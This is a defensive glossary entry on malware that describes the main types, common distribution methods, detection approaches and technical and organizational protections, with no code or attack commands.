Malware
A general term for any type of software developed with the intent to cause damage, steal data, or compromise systems—from viruses and Trojans to ransomware.
Malware (short for "malicious software") is the umbrella term for all types of malicious software that have been intentionally developed to damage systems, steal data, take control, or cause other harm.
Major Types of Malware
Virus: Infects legitimate files and spreads itself when executed. A classic type, less common today than in the past—antivirus software has largely contained this type.
Trojan (Trojan Horse): Disguises itself as useful software. Opens backdoors or steals data. The most common means of distribution for other malware—e.g., via fake invoice PDFs.
Ransomware: Encrypts data and demands a ransom. Remains the biggest threat to businesses in 2024—average ransom demand: $2.73 million (Coveware).
Spyware: Secretly monitors activities—keyloggers, screenshot capture, camera access. Used for industrial espionage and government surveillance (e.g., Pegasus).
Rootkit: Hides itself and other malware deep within the system (kernel level or bootloader). Very difficult to detect and remove—often requires a clean install.
Worm: Spreads autonomously across networks without a host program. Classic examples: WannaCry (2017, >200,000 systems in 150 countries), NotPetya (2017, $10 billion in damages).
Backdoor: Secret access that bypasses normal authentication. Often set up by other types of malware—or installed directly by APT groups for long-term access.
Fileless Malware: Exists only in RAM, no files on the hard drive—particularly difficult to detect, as traditional antivirus software has nothing to scan. Uses PowerShell, WMI, LOLBins.
Stealer (Info Stealer): Targets credentials, cookies, and crypto wallets. Known families: RedLine Stealer, Raccoon, Vidar, LummaC2. The data ends up as "stealer logs" on the dark web.
Adware/Scareware: Less harmful—annoying with ads or fake virus alerts designed to extort money ("Your PC is infected! Call: +1-800...").
Distribution
Most common distribution methods:
- Phishing emails (91% of all malware infections start here) – macro-enabled Office documents, malicious attachments
- Drive-by downloads – compromised websites automatically infect visitors via browser exploits
- Infected USB drives – 60% of people plug in found USB drives (IBM study)
- Software downloads from unofficial sources – cracked software, tools on dubious sites
- Supply chain attacks – legitimate software updates contain malware (SolarWinds 2020)
- Exploits against unpatched systems – known CVEs in VPNs, Exchange, and web servers
Detection Methods
- Signature-based: Comparison with known malware signatures – fast, but does not detect zero-days or new variants
- Heuristic: Behavioral analysis of suspicious actions – slower, but detects new variants
- Sandboxing: Execution in an isolated environment for behavioral analysis before delivery to users
- EDR (Endpoint Detection & Response): Continuous monitoring of all processes, registry changes, and network connections – also detects fileless malware and LOLBin abuse
Protective Measures
Technical:
- EDR on all endpoints (not just traditional antivirus)
- Email gateway with attachment sandboxing
- Disable macros in Office (GPO) or allow them only for signed documents
- Disable USB ports or enable them only for approved devices
- Regular patching (attackers often exploit vulnerabilities that have been known for weeks)
Organizational:
- Security awareness training – employees are the most common point of entry
- Least privilege principle: malware can only use the privileges of the infected account
- Network segmentation: limits the spread of worms and ransomware
